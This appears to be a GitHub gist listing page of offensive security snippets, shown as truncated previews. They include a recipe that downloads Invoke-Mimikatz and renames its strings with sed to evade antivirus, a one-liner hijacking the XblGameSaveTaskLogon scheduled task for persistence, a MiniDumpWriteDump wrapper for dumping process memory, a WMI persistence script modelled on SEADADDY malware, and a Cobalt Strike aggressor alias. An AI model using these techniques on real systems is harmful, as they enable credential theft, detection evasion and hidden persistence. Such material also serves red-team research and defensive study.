- Fireeye HammerToss PDF: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- 7 Years of Dukes: https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/
- RTM Banking malware: https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
- Lowball Malware: https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html
- CloudAtlas malware: https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
143 function Invoke-Mimidogz | |
140 function Invoke-Mimikatz | |
29 function Invoke-Mimi | |
10 function Chokorun | |
7 function Invoke-Ttest | |
7 function Invoke-Mimiwormz | |
7 function Invoke-Me | |
6 function Invoke-Mimiturtle | |
6 function Invoke-Mimimi | |
5 function output |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from Microsoft.Win32 import Registry | |
from time import sleep | |
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!') | |
rkey.Close() | |
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
values = rkey.GetValueNames() | |
print("We have {0} values.".format(str(len(values)))) | |
print("The value names returned are: {0}.".format(values[0])) | |
value = rkey.GetValue(u'\x00 this is a test') |
DisplayName Twitterhandle
----------- -------------
fr016 @fr0161
chgopsug @chgopsug
Kevin Bates @_bateskevin
Danny Maertens @maertend33
Julien Reisdorffer @JReisdorffer
Ben Reader @powers_hell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
$temppath = "/tmp/"; | |
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
alias sharpgen{ | |
$executionId = "sharpgen_" . int(rand() * 100000); | |
$temporaryCsharp = $temppath . $executionId . ".cs"; | |
$executableFilename = $temppath . $executionId . ".exe"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Source = @" | |
using System; | |
using System.Runtime.InteropServices; | |
namespace ProcDump { | |
public static class DbgHelp { | |
[DllImport("Dbghelp.dll")] | |
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, IntPtr DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' | |
' SYNOPSIS: | |
' WMI Persistence method as originally presented by SEADADDY malware | |
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
' and further documented by Matt Graeber. | |
' | |
' The scheduled command will be launched after roughly 3 minutes since system | |
' gets up. Also, even if the command shall spawn a window - it will not be visible, | |
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0. | |
' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# AV Bypass to run Mimikatz | |
# From: https://www.blackhillsinfosec.com/?p=5555 | |
# Server side: | |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |
OlderNewer